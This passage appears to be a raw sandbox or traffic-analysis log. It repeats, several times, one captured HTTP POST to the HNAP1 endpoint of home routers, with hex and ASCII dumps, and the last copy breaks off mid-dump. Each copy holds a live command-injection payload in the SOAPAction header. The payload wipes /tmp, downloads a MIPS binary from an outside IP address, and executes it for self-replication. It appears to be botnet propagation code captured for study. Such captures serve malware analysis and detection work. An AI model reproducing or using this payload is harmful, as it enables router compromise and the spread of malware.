                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 